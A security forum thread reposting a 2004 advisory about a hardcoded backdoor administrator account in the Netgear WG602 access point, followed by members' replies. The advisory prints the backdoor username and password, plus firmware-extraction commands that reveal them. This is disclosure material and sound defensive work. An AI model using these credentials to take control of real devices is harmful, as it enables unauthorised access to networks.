Netgear Owners, Heads UP
Results 1 to 9 of 9

Thread: Netgear Owners, Heads UP

  1. #1
    Senior Member
    Join Date
    Sep 2003
    Posts
    500

    Netgear Owners, Heads UP

    Just saw this on bugtraq. Netgear owners check it out!

    KHAMSIN Security News
    KSN Reference: 2004-06-03 0001 TIP
    ---------------------------------------------------------------------------

    Title
    -----
    The Netgear WG602 Accesspoint contains an undocumented
    administrative account.

    Date
    ----
    2004-06-03


    Description
    -----------

    The webinterface which is reachable from both interfaces (LAN/WLAN)
    contains an undocumented administrative account which cannot be disabled.

    Any user logging in with the username "super" and the password "5777364"
    is in complete control of the device.

    This vulnerability can be exploited by any person which is able to reach
    the webinterface of the device with a webbrowser.

    A search on Google revealed that "5777364" is actually the phonenumber
    of z-com Taiwan which develops and offers WLAN equipment for its OEM
    customers.

    Currently it is unknown whether other Vendors are shipping products
    based on z-com OEM designs.


    Systems Affected
    ----------------

    Vulnerable (verified)
    WG602 with Firmware Version 1.04.0

    Possibly vulnerable (not verified)
    WG602 with other Firmware Versions
    WG602v2
    All other z-com derived WLAN Accesspoints


    Proof of concept
    ----------------

    Download the WG602 Version 1.5.67 firmware from Netgear
    ( http://kbserver.netgear.com/support....asp?dnldID=366 )
    and run the following shell commands on a UNIX box:

    $ dd if=wg602_1.5.67_firmware.img bs=1 skip=425716 > rd.img.gz
    $ zcat rd.img.gz | strings | grep -A5 -B5 5777364

    Which results in the following output:

    %08lx:%08lx:%s
    %08lx%08lx%08lx%08lx
    Authorization
    BASIC
    super <---- Username
    5777364 <---- Password
    %02x
    Content-length
    HTTP_USER_AGENT
    HTTP_ACCEPT
    SERVER_PROTOCOL

    Disclaimer
    ----------

    This advisory does not claim to be complete or to be usable for
    any purpose. Especially information on the vulnerable systems may
    be inaccurate or wrong. Possibly supplied exploit code is not to
    be used for malicious purposes, but for educational purposes only.
    This advisory is free for open distribution in unmodified form.

    http://www.khamsin.ch



    ---------------------------------------------------------------
    KHAMSIN Security GmbH Zuercherstr. 204 / CH-9014 St. Gallen
    http://www.khamsin.ch
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-

  2. #2
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,884
    Looks like the home/small office router vendors are on the radar of the security community now...


    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  3. #3
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    Methinks the linksys vulnerability kinds pales into insignificance compared to this one.

    Can the netgear disable all access to the WAN configuration like the Linksys claims to?

    [Edit]

    Hoss: Spammers? As these things become more prevalent they need to find ways through them to get there "bounces" done.....

    [/Edit]
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  4. #4
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Can the netgear disable all access to the WAN configuration like the Linksys claims to?
    No. They don't think it's serious. When they came out with their RP114 routers, it was discovered that you could use the private address scheme on the WAN connection to access the router. They never considered it a serious issue (or so said an internal NetGear type to the SO when I queried about it).

    Thankfully, that password seems specific to models. Doesn't work on my RP114. I'll have to try the RP614 to see if it's affected (possibly not since neither of these are wireless).
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  5. #5
    Senior Member Zonewalker's Avatar
    Join Date
    Jul 2002
    Posts
    949
    well I have an RP614v2 at home and it doesn't seem to work so I'd concur with MsM on this... the WG602 is a wireless one isn't it?
    Quis Custodiet Ipsos Custodes

  6. #6
    Senior Member
    Join Date
    Sep 2003
    Posts
    500
    The creepy thing is that the vendors who produced the parts put the backdoor in there. Just makes me wonder if anything else has a backdoor like this...mainly my stuff.
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-

  7. #7
    Senior Member Zonewalker's Avatar
    Join Date
    Jul 2002
    Posts
    949
    Just makes me wonder if anything else has a backdoor like this...mainly my stuff.
    the cynical side of me says yes very likely - probably lots of things that is, at least in theory, one good thing about open source stuff - much more difficult to hide back doors.
    Quis Custodiet Ipsos Custodes

  8. #8
    Member
    Join Date
    Apr 2003
    Posts
    95
    Phew, Doesnt seem to work on my Netgear DG834G. Lets hope it doesnt affect their whole range.

  9. #9
    Senior Member
    Join Date
    Sep 2003
    Posts
    500
    Well that is the thing about hardware. Specially for hardware that one can't flash the firmware. Then you have a nice solid backdoor that can't be fixed.
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •